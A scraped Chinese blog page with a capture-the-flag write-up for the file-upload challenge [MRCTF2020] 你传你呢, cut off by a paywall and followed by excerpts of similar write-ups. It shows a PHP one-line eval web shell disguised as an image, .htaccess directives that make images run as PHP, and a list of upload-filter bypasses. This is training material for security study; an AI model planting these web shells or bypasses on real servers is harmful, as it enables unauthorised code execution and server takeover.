[MRCTF2020]你传你呢

最新推荐文章于 2023-10-12 20:14:13 发布
最新推荐文章于 2023-10-12 20:14:13 发布
阅读量744 收藏 2
点赞数 3
分类专栏: # buuctf 文章标签: 安全 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Alexhcf/article/details/108415941
版权
本文介绍了MRCTF2020比赛中涉及的文件上传漏洞利用,包括图片马、Content-Type验证绕过及.htaccess文件的使用。通过信息收集,发现后端为PHP,利用特定字典尝试文件上传。最终,作者通过修改Content-Type并利用图片马创建了.htaccess文件,成功获取蚁剑连接,但由于disable_functions限制,无法直接读取flag,只能下载。
摘要由CSDN通过智能技术生成

知识点

文件上传:图片马&Content-Type验证&.htacess文件

信息收集

应该是考察文件上传,后端是php。
考虑到文件上传姿势比较多,如果一个个试很浪费时间,所以这里找了个php文件上传的字典
貌似是图片马可以,所以可以开始利用

利用过程

准备一张图片马,命名shell.png

   <?php @eval($_POST['attack']) ?>

.htaccess文件


                

                
                
        

        

    




        

            

                    
                      最低0.47元/天 解锁文章
                        
                    
            

        

    

      

        

            

              
                
                  尸者狗
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                    3
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    2
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      

            

                专栏目录
          










                



	

		

			

				
					
BUUCTF之[MRCTF2020]你你呢 1

				
			

			

				

					qq_44122254的博客
				

				

					02-10
					
					1973
					
				

			

		

		

			
				
打开题目靶场,发现是一个上页面

随便上一个文件进行试验一下

发现对此文件有进行过滤
上一个图片进行尝试,发现可以上png图片,制作图片码进行上
图片码内容如下

发现可以上成功但是蚁剑连接的话并不能够连接成功,数据为空

...

			
		

	



                

              
                



	

		

			

				
					
vigenere-cipher:Vigenere密码

				
			

			

				

					03-19
				

			

		

		

			
				
它由重复26行/列的字母表组成,但是第一个字母被推到字母表的末尾,并且一直持续到z是第25行中的第一个字母为止。然后,程序将密钥用于行,将消息加密用于列。字母匹配,并显示加密的消息。标点和空格保持不变。

			
		

	



                


  
              

                


	

		

			

				
					
[MRCTF2020]你你呢1

				
			

			

				

					:-)
				

				

					03-31
					
					1575
					
				

			

		

		

			
				
[MRCTF2020]你你????呢1
STEP1:尝试改写文件头和和文件内容
显示:


判断可能与user.ini或.htaccess文件有关
STEP2:上.htaccess文件
显示:


上成功,上一个1.png文件
STEP3:上1.png文件包含一句木
显示:

STEP4:蚁剑连接
显示:

得到flag

...

			
		

	





	

		

			

				
					
【BUUCTF之[MRCTF2020]你你呢 1】

				
			

			

				

					qq_40646572的博客
				

				

					10-25
					
					5368
					
				

			

		

		

			
				
首先,正常上图片文件,竟然因为文件大小的问题,上失败,就挺难受。不过还好,总算知道是什么原因不能上。总体来讲,这道题,难度是可以的,需要一步步的进行尝试。

			
		

	



		

			
		



	

		

			

				
					
采区含断层工作面冲击失稳预测

				
			

			

				

					04-19
				

			

		

		

			
				
本文以矿井西二采区某一工作面为工程背景,根据数值模拟峰前扰动时断层面应力、位移分叉趋势对断层冲击地压危险区域进行了初步划分,通过现场电磁辐射监测结果分析可知:预测的预警距离是工作面距断层35m时应当采取加强...

			
		

	





	

		

			

				
					
CTF 逆向练习-Transform

				
			

			

				

					06-10
				

			

		

		

			
				
该资源配合博客使用,博客我还没写。 有空我会在哔哩哔哩录制教程。

			
		

	





	

		

			

				
					
向前欧拉法matlab代码-zbc-ops:我的GitHub个人资料的配置文件

				
			

			

				

					05-20
				

			

		

		

			
				
向前欧拉法matlab代码 本周还是刷题,深入学习了winner攻击以及extend winner attack.然后就是做了几个有关造格子的题,没学很多,挺忙的。 直接从博客复制过来的,格式和markdown显示有点...选择不同的素数对,$l

			
		

	





	

		

			

				
					
[MRCTF2020]你你呢 1

				
			

			

				

					shinygod的博客
				

				

					02-11
					
					2105
					
				

			

		

		

			
				
知识点:.htaccess和.user.ini的区别

上php,phtml,txt…类型的文件都会被过滤

抓包改content-type也不行
上个jpg格式,里面有一句话木

路径出来了,我们可以用



			
		

	





	

		

			

				
					
BUUCTF之[MRCTF2020]你你呢1

					
最新发布

				
			

			

				

					weixin_66294723的博客
				

				

					10-12
					
					893
					
				

			

		

		

			
				
很明显是文件上漏洞,通过🐎可知应该是要一个进去,一开始把自己制作的图片进去后自己的图片不行,content-type也没问题后上网找wp发现如果一系列%00,改大小写,图片之类都不行的话 ,或者上之后 但是菜刀连接不了,回显显示没有数据的话,就代表要改配置文件。

			
		

	





	

		

			

				
					
BUUCTF之[MRCTF2020]你你呢-------文件解析漏洞

				
			

			

				

					weixin_44632787的博客
				

				

					06-19
					
					9127
					
				

			

		

		

			
				
BUUCTF之[MRCTF2020]你你????呢
虽然这题对于大佬来说是属于简单题。但是对于我这种小白来说却是第一次见。算是学到东西了。所以在此记录一下,以后看到这种类似的题目也可以回来复习。。。
首先,启动挑战的项目

emmmmmmm这个页面很有个性。。。一开始以为只是个简单的文件上漏洞,结果没做出来。
不管怎么样,先上一句话木。并且将下面的内容保存成文件1.png
GIF89a? 
<script language="php">eval($_POST['zyh']);</s

			
		

	





	

		

			

				
					
BUUCTF Web [MRCTF2020]你你呢1 & [极客大挑战 2019]HardSQL1

				
			

			

				

					网安小趴菜
				

				

					09-07
					
					742
					
				

			

		

		

			
				
BUUCTF Web [MRCTF2020]你你🐎呢1 & [极客大挑战 2019]HardSQL1

			
		

	





	

		

			

				
					
BUUCTF闯关日记--[MRCTF2020]你你呢(超详解)

				
			

			

				

					qq_64201116的博客
				

				

					05-19
					
					3785
					
				

			

		

		

			
				
进入页面



文件上漏洞,因为有些人没看过我前面的文章我再把我的总结发一下

1、前端绕过,抓包修改后缀名,

2、文件内容绕过,用图片,抓包修改后缀绕过

3、黑名单绕过,那么我们可以改成phtml抓包绕过

4、.htaccess绕过,只要有这个配置文件,并且内容为“AddType application/x-httpd-php .jpg(就是把所以jpg后缀的文件全都当作php文件来执行)”

5、大小写绕过,抓包后修改后缀为.PHp

7、空格绕过,抓包修改后缀,在后缀后面加上空格

8、点绕

			
		

	





	

		

			

				
					
文件上 ---[MRCTF2020]你你呢

				
			

			

				

					yzl_007的博客
				

				

					08-20
					
					293
					
				

			

		

		

			
				
[MRCTF2020]你你????呢

进入题目很醒目的打招呼方式
查看源码发现没什么东西
接着上试试,php被静止可以上jpg等图片
想到上.htaccess文件解析jpg

修改Contnet-Type上成功

文件中  SetHandler application/x-httpd-php 这句话是将任何文件解析成php文件的意思,这个时候就可以上jpg文件来连接了。
jpg文件能直接上,写下一句话木然后改后缀直接上即可
如下上成功,然后用蚁剑连接

http://acc07ec

			
		

	





	

		

			

				
					
buuctf misc [MRCTF2020]ezmisc 1

				
			

			

				

					05-16
				

			

		

		

			
				
这是一个关于MRCTF2020比赛的misc题目,题目名称为ezmisc 1。不知道你需要什么样的帮助,我可以给你一些关于此题的信息。  题目描述:  There are some problems to solve! Each problem corresponds to a flag. ...

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值